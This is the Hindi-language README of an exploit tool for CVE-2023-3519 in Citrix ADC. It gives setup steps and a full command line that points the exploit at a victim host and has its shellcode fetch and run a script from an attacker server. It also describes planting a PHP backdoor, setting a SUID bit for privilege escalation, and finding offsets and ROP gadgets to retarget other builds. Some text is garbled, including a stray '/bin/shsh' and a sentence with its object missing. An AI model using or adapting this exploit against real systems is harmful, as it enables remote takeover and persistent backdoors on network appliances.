
CVE-2023-3519 के लिए Python एक्सप्लॉइट जो कस्टम NASM शेलकोड, PHP बैकडोर तैनाती, और SUID विशेषाधिकार वृद्धि के साथ Citrix ADC को लक्षित करता है।
यह एक्सप्लॉइट Citrix VPX 13.1-48.47 के लिए एड्रेस और शेलकोड का उपयोग करता है। पूर्ण लेख के लिए, यहाँ क्लिक करें।
शेलकोड बनाने के लिए NASM आवश्यक है।
$ sudo apt install nasm
शामिल शेलकोड रिमोट http(s) सर्वर से एक शेल स्क्रिप्ट डाउनलोड और चलाएगा। स्क्रिप्ट 3 तर्क लेता है: लक्ष्य होस्ट, लक्ष्य पोर्ट, और शेल स्क्रिप्ट पेलोड का URL। एक उदाहरण पेलोड जो स्वयं को साफ करने से पहले id और uname -a चलाता है, इस रिपॉजिटरी में शामिल है।
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a
URL इतना छोटा होना चाहिए कि शेलकोड बफर में फिट हो जाए, और यदि यह बहुत लंबा है तो आपको एक चेतावनी मिलेगी।
शेलकोड /var/netscaler/logon/a.php में एक PHP बैकडोर बनाएगा और पर SUID बिट सेट करेगा। शामिल पेलोड इन आर्टिफैक्ट्स को स्वचालित रूप से साफ करने का एक उदाहरण दिखाता है। यह भी ध्यान दें कि शेलकोड अपने फ़ाइल डिस्क्रिप्टर को बंद नहीं करता है, इसलिए अत्यधिक बार-बार शोषण के परिणामस्वरूप संसाधन समाप्ति हो सकती है।
/bin/shshFreeBSD-आधारित Citrix लक्ष्यों के लिए, आपको केवल 3 मान खोजने की आवश्यकता है: सहेजे गए रिटर्न पॉइंटर का ऑफसेट, एक jmp rsp ROP गैजेट (या इसके समतुल्य, जैसे push rsp; ret;), और क्रैश से बचने के लिए कूदने का पता। ये पैरामीटर सभी cve-2023-3519.py के शीर्ष के पास हार्डकोडेड हैं।